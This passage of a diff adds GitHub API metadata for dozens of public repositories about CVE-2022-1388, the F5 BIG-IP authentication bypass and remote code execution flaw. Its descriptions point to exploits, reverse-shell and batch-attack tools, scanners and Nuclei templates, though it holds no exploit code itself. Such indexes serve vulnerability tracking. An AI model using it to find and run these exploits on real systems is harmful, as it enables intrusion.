"watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490234251, + "name": "CVE-2022-1388", + "full_name": "0xf4n9x\/CVE-2022-1388", + "owner": { + "login": "0xf4n9x", + "id": 40891670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4", + "html_url": "https:\/\/github.com\/0xf4n9x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2022-1388", + "description": "CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE", + "fork": false, + "created_at": "2022-05-09T10:22:31Z", + "updated_at": "2024-10-29T13:22:14Z", + "pushed_at": "2022-06-28T18:14:40Z", + "stargazers_count": 86, + "watchers_count": 86, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 86, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 490237968, + "name": "CVE-2022-1388_PoC", + "full_name": "alt3kx\/CVE-2022-1388_PoC", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2022-1388_PoC", + "description": "F5 BIG-IP RCE exploitation (CVE-2022-1388)", + "fork": false, + "created_at": "2022-05-09T10:34:38Z", + "updated_at": "2024-08-16T11:43:21Z", + "pushed_at": "2022-05-16T12:40:51Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 87, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 490241404, + "name": "F5-Big-IP-CVE-2022-1388", + "full_name": "Vulnmachines\/F5-Big-IP-CVE-2022-1388", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/F5-Big-IP-CVE-2022-1388", + "description": "CVE-2022-1388 F5 Big IP unauth remote code execution", + "fork": false, + "created_at": "2022-05-09T10:46:19Z", + "updated_at": "2024-08-12T20:23:07Z", + "pushed_at": "2022-07-26T05:18:58Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490254474, + "name": "F5-CVE-2022-1388-Exploit", + "full_name": "ZephrFish\/F5-CVE-2022-1388-Exploit", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/F5-CVE-2022-1388-Exploit", + "description": "Exploit and Check Script for CVE 2022-1388", + "fork": false, + "created_at": "2022-05-09T11:30:09Z", + "updated_at": "2024-08-12T20:23:07Z", + "pushed_at": "2022-05-26T23:51:01Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 58, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 490259731, + "name": "CVE-2022-1388", + "full_name": "horizon3ai\/CVE-2022-1388", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2022-1388", + "description": "POC for CVE-2022-1388", + "fork": false, + "created_at": "2022-05-09T11:46:45Z", + "updated_at": "2024-10-21T10:38:20Z", + "pushed_at": "2022-05-09T20:52:07Z", + "stargazers_count": 230, + "watchers_count": 230, + "has_discussions": false, + "forks_count": 41, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 41, + "watchers": 230, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 490307613, + "name": "CVE-2022-1388", + "full_name": "Al1ex\/CVE-2022-1388", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2022-1388", + "description": "CVE-2022-1388 F5 BIG-IP iControl REST RCE", + "fork": false, + "created_at": "2022-05-09T14:01:38Z", + "updated_at": "2024-08-19T13:46:57Z", + "pushed_at": "2022-05-09T14:20:40Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-1388", + "f5-big-ip-icontrol-rest-rce" + ], + "visibility": "public", + "forks": 12, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490307975, + "name": "CVE-2022-1388", + "full_name": "Henry4E36\/CVE-2022-1388", + "owner": { + "login": "Henry4E36", + "id": 41940481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4", + "html_url": "https:\/\/github.com\/Henry4E36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henry4E36\/CVE-2022-1388", + "description": "F5 BIG-IP iControl REST身份验证绕过漏洞", + "fork": false, + "created_at": "2022-05-09T14:02:34Z", + "updated_at": "2024-01-29T17:31:44Z", + "pushed_at": "2022-08-22T01:20:14Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490321219, + "name": "CVE-2022-1388", + "full_name": "savior-only\/CVE-2022-1388", + "owner": { + "login": "savior-only", + "id": 69495405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69495405?v=4", + "html_url": "https:\/\/github.com\/savior-only", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/savior-only\/CVE-2022-1388", + "description": "CVE-2022-1388 F5 BIG-IP iControl REST身份验证绕过漏洞", + "fork": false, + "created_at": "2022-05-09T14:37:04Z", + "updated_at": "2022-05-09T14:39:16Z", + "pushed_at": "2022-05-13T18:18:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490339060, + "name": "CVE-2022-1388", + "full_name": "saucer-man\/CVE-2022-1388", + "owner": { + "login": "saucer-man", + "id": 32133080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32133080?v=4", + "html_url": "https:\/\/github.com\/saucer-man", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saucer-man\/CVE-2022-1388", + "description": "CVE-2022-1388", + "fork": false, + "created_at": "2022-05-09T15:24:27Z", + "updated_at": "2023-03-08T01:02:33Z", + "pushed_at": "2022-05-09T16:14:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490345813, + "name": "CVE-2022-1388", + "full_name": "superzerosec\/CVE-2022-1388", + "owner": { + "login": "superzerosec", + "id": 57648217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4", + "html_url": "https:\/\/github.com\/superzerosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superzerosec\/CVE-2022-1388", + "description": "CVE-2022-1388 POC exploit", + "fork": false, + "created_at": "2022-05-09T15:42:55Z", + "updated_at": "2022-08-23T19:50:16Z", + "pushed_at": "2022-05-10T04:53:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490521216, + "name": "Exploit-F5-CVE-2022-1388", + "full_name": "Stonzyy\/Exploit-F5-CVE-2022-1388", + "owner": { + "login": "Stonzyy", + "id": 33039121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33039121?v=4", + "html_url": "https:\/\/github.com\/Stonzyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stonzyy\/Exploit-F5-CVE-2022-1388", + "description": "PoC For F5 BIG-IP - bash script Exploit one Liner", + "fork": false, + "created_at": "2022-05-10T02:57:31Z", + "updated_at": "2024-01-26T09:41:01Z", + "pushed_at": "2022-05-10T08:38:58Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490537604, + "name": "Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter", + "full_name": "MrCl0wnLab\/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter", + "owner": { + "login": "MrCl0wnLab", + "id": 17049332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17049332?v=4", + "html_url": "https:\/\/github.com\/MrCl0wnLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrCl0wnLab\/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter", + "description": "CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.", + "fork": false, + "created_at": "2022-05-10T04:10:46Z", + "updated_at": "2024-06-26T05:28:41Z", + "pushed_at": "2022-05-12T17:06:29Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bigip", + "bigip-rest-api", + "cve-2022-1388", + "exploit", + "f5-bigip", + "nuclei", + "nuclei-templates" + ], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490544324, + "name": "F5-BigIP-CVE-2022-1388", + "full_name": "qusaialhaddad\/F5-BigIP-CVE-2022-1388", + "owner": { + "login": "qusaialhaddad", + "id": 9527146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9527146?v=4", + "html_url": "https:\/\/github.com\/qusaialhaddad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qusaialhaddad\/F5-BigIP-CVE-2022-1388", + "description": "Reverse Shell for CVE-2022-1388", + "fork": false, + "created_at": "2022-05-10T04:44:05Z", + "updated_at": "2024-08-12T20:23:08Z", + "pushed_at": "2022-05-10T05:00:43Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490545813, + "name": "CVE-2022-1388", + "full_name": "chesterblue\/CVE-2022-1388", + "owner": { + "login": "chesterblue", + "id": 38368702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38368702?v=4", + "html_url": "https:\/\/github.com\/chesterblue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chesterblue\/CVE-2022-1388", + "description": "POC of CVE-2022-1388", + "fork": false, + "created_at": "2022-05-10T04:51:06Z", + "updated_at": "2022-05-10T05:01:29Z", + "pushed_at": "2022-05-10T04:58:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490554565, + "name": "F5-BIG-IP-RCE-CVE-2022-1388", + "full_name": "Angus-Team\/F5-BIG-IP-RCE-CVE-2022-1388", + "owner": { + "login": "Angus-Team", + "id": 103045627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103045627?v=4", + "html_url": "https:\/\/github.com\/Angus-Team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Angus-Team\/F5-BIG-IP-RCE-CVE-2022-1388", + "description": null, + "fork": false, + "created_at": "2022-05-10T05:30:11Z", + "updated_at": "2024-08-12T20:23:08Z", + "pushed_at": "2022-05-10T05:35:23Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490601730, + "name": "CVE-2022-1388-EXP", + "full_name": "LinJacck\/CVE-2022-1388-EXP", + "owner": { + "login": "LinJacck", + "id": 57176639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57176639?v=4", + "html_url": "https:\/\/github.com\/LinJacck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LinJacck\/CVE-2022-1388-EXP", + "description": "CVE-2022-1388-EXP可批量实现攻击", + "fork": false, + "created_at": "2022-05-10T08:09:30Z", + "updated_at": "2022-08-15T15:42:24Z", + "pushed_at": "2022-05-10T08:14:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490606277, + "name": "cve-2022-1388-1veresk", + "full_name": "iveresk\/cve-2022-1388-1veresk", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2022-1388-1veresk", + "description": "Simple shell script for the exploit", + "fork": false, + "created_at": "2022-05-10T08:22:46Z", + "updated_at": "2022-12-20T12:13:57Z", + "pushed_at": "2022-05-24T12:39:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490613608, + "name": "CVE-2022-1388", + "full_name": "shamo0\/CVE-2022-1388", + "owner": { + "login": "shamo0", + "id": 48299520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48299520?v=4", + "html_url": "https:\/\/github.com\/shamo0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shamo0\/CVE-2022-1388", + "description": "BIG-IP iControl REST vulnerability CVE-2022-1388 PoC", + "fork": false, + "created_at": "2022-05-10T08:44:24Z", + "updated_at": "2023-03-10T12:12:32Z", + "pushed_at": "2022-05-10T09:09:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "1388", + "2022", + "bash", + "bigip", + "cve", + "cve-2022-1388", + "exploit", + "f5", + "icontrol", + "python", + "rest", + "script", + "shell", + "vulnerabilit" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490623250, + "name": "CVE-2022-1388-F5-BIG-IP", + "full_name": "vesperp\/CVE-2022-1388-F5-BIG-IP", + "owner": { + "login": "vesperp", + "id": 28191544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28191544?v=4", + "html_url": "https:\/\/github.com\/vesperp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vesperp\/CVE-2022-1388-F5-BIG-IP", + "description": null, + "fork": false, + "created_at": "2022-05-10T09:12:22Z", + "updated_at": "2022-05-18T08:46:17Z", + "pushed_at": "2022-05-18T08:32:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490752282, + "name": "CVE-2022-1388-Exploit", + "full_name": "thatonesecguy\/CVE-2022-1388-Exploit", + "owner": { + "login": "thatonesecguy", + "id": 34110198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34110198?v=4", + "html_url": "https:\/\/github.com\/thatonesecguy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thatonesecguy\/CVE-2022-1388-Exploit", + "description": "Test and Exploit Scripts for CVE 2022-1388 (F5 Big-IP)", + "fork": false, + "created_at": "2022-05-10T15:16:12Z", + "updated_at": "2024-08-12T20:23:09Z", + "pushed_at": "2022-05-10T15:28:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490758825, + "name": "CVE2022-1388_TestAPI", + "full_name": "bandit92\/CVE2022-1388_TestAPI", + "owner": { + "login": "bandit92", + "id": 11216382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11216382?v=4", + "html_url": "https:\/\/github.com\/bandit92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bandit92\/CVE2022-1388_TestAPI", + "description": "A Test API for testing the POC against CVE-2022-1388", + "fork": false, + "created_at": "2022-05-10T15:34:14Z", + "updated_at": "2022-05-26T21:22:13Z", + "pushed_at": "2022-05-10T15:37:42Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490762622, + "name": "CVE-2022-1388-PocExp", + "full_name": "0x7eTeam\/CVE-2022-1388-PocExp", + "owner": { + "login": "0x7eTeam", + "id": 96908273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96908273?v=4", + "html_url": "https:\/\/github.com\/0x7eTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x7eTeam\/CVE-2022-1388-PocExp", + "description": "CVE-2022-1388-PocExp,新增了多线程,F5 BIG-IP RCE exploitation", + "fork": false, + "created_at": "2022-05-10T15:44:50Z", + "updated_at": "2024-08-12T20:23:09Z", + "pushed_at": "2022-05-16T14:02:29Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490856318, + "name": "CVE-2022-1388", + "full_name": "0xAgun\/CVE-2022-1388", + "owner": { + "login": "0xAgun", + "id": 78228966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78228966?v=4", + "html_url": "https:\/\/github.com\/0xAgun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAgun\/CVE-2022-1388", + "description": null, + "fork": false, + "created_at": "2022-05-10T20:49:12Z", + "updated_at": "2024-08-12T20:23:10Z", + "pushed_at": "2022-05-14T15:01:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491215019, + "name": "CVE-2022-1388-Scanner", + "full_name": "AmirHoseinTangsiriNET\/CVE-2022-1388-Scanner", + "owner": { + "login": "AmirHoseinTangsiriNET", + "id": 64230943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64230943?v=4", + "html_url": "https:\/\/github.com\/AmirHoseinTangsiriNET", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AmirHoseinTangsiriNET\/CVE-2022-1388-Scanner", + "description": null, + "fork": false, + "created_at": "2022-05-11T17:43:44Z", + "updated_at": "2024-08-12T20:23:11Z", + "pushed_at": "2022-05-27T11:27:32Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491248239, + "name": "CVE-2022-1388", + "full_name": "EvilLizard666\/CVE-2022-1388", + "owner": { + "login": "EvilLizard666", + "id": 46286364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46286364?v=4", + "html_url": "https:\/\/github.com\/EvilLizard666", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EvilLizard666\/CVE-2022-1388", + "description": "CVE-2022-1388 Scanner", + "fork": false, + "created_at": "2022-05-11T19:33:37Z", + "updated_at": "2024-03-23T10:55:01Z", + "pushed_at": "2023-01-22T02:08:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491258779, + "name": "CVE-2022-1388", + "full_name": "mr-vill4in\/CVE-2022-1388", + "owner": { + "login": "mr-vill4in", + "id": 51061936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51061936?v=4", + "html_url": "https:\/\/github.com\/mr-vill4in", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-vill4in\/CVE-2022-1388", + "description": "CVE-2022-1388", + "fork": false, + "created_at": "2022-05-11T20:13:09Z", + "updated_at": "2022-10-07T18:14:59Z", + "pushed_at": "2022-05-11T20:15:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491262541, + "name": "CVE-2022-1388", + "full_name": "omnigodz\/CVE-2022-1388", + "owner": { + "login": "omnigodz", + "id": 20488509, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20488509?v=4", + "html_url": "https:\/\/github.com\/omnigodz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omnigodz\/CVE-2022-1388", + "description": "This repository consists of the python exploit for CVE-2022-1388 (F5's BIG-IP Authentication Bypass to RCE) ", + "fork": false, + "created_at": "2022-05-11T20:27:36Z", + "updated_at": "2022-05-11T20:27:59Z", + "pushed_at": "2022-06-08T13:57:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491283164, + "name": "CVE-2022-1388", + "full_name": "pauloink\/CVE-2022-1388", + "owner": { + "login": "pauloink", + "id": 64289774, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64289774?v=4", + "html_url": "https:\/\/github.com\/pauloink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pauloink\/CVE-2022-1388", + "description": null, + "fork": false, + "created_at": "2022-05-11T21:55:43Z", + "updated_at": "2024-08-12T20:23:11Z", + "pushed_at": "2022-05-11T22:00:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491500644, + "name": "CVE-2022-1388", + "full_name": "SecTheBit\/CVE-2022-1388", + "owner": { + "login": "SecTheBit", + "id": 46895441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46895441?v=4", + "html_url": "https:\/\/github.com\/SecTheBit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecTheBit\/CVE-2022-1388", + "description": "Nuclei Template for CVE-2022-1388", + "fork": false, + "created_at": "2022-05-12T12:17:11Z", + "updated_at": "2022-05-13T06:43:45Z", + "pushed_at": "2022-05-12T12:32:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491598048, + "name": "CVE-2022-1388", + "full_name": "Zeyad-Azima\/CVE-2022-1388", + "owner": { + "login": "Zeyad-Azima", + "id": 62406753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62406753?v=4", + "html_url": "https:\/\/github.com\/Zeyad-Azima", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeyad-Azima\/CVE-2022-1388", + "description": "F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB", + "fork": false, + "created_at": "2022-05-12T16:54:52Z", + "updated_at": "2024-08-17T03:10:10Z", + "pushed_at": "2023-05-11T02:55:01Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-1388", + "exploit", + "f5", + "f5-bigip", + "icontrol", + "rest-api" + ], + "visibility": "public", + "forks": 6, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 491851727, + "name": "CVE-2022-1388", + "full_name": "justakazh\/CVE-2022-1388", + "owner": { + "login": "justakazh", + "id": 36891477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36891477?v=4", + "html_url": "https:\/\/github.com\/justakazh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/justakazh\/CVE-2022-1388", + "description": "Tool for CVE-2022-1388 ", + "fork": false, + "created_at": "2022-05-13T10:18:29Z", + "updated_at": "2024-08-12T20:23:14Z", + "pushed_at": "2022-05-13T10:22:08Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "cve", + "cve-2022-1388", + "exploit", + "tools" + ], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 492382276, + "name": "CVE-2022-1388-POC", + "full_name": "PsychoSec2\/CVE-2022-1388-POC", + "owner": { + "login": "PsychoSec2", + "id": 102695468, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102695468?v=4", + "html_url": "https:\/\/github.com\/PsychoSec2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PsychoSec2\/CVE-2022-1388-POC", + "description": "An Improved Proof of Concept for CVE-2022-1388 w\/ an Interactive Shell", + "fork": false, + "created_at": "2022-05-15T03:58:21Z", + "updated_at": "2023-10-18T22:22:53Z", + "pushed_at": "2022-05-15T16:34:54Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 492435532, + "name": "cve-2022-1388-iveresk-command-shell", + "full_name": "iveresk\/cve-2022-1388-iveresk-command-shell", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2022-1388-iveresk-command-shell", + "description": "Improved POC for CVE-2022-1388 that affects multiple F5 products.", + "fork": false, + "created_at": "2022-05-15T08:58:22Z", + "updated_at": "2022-05-18T05:53:50Z", + "pushed_at": "2022-05-24T12:39:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 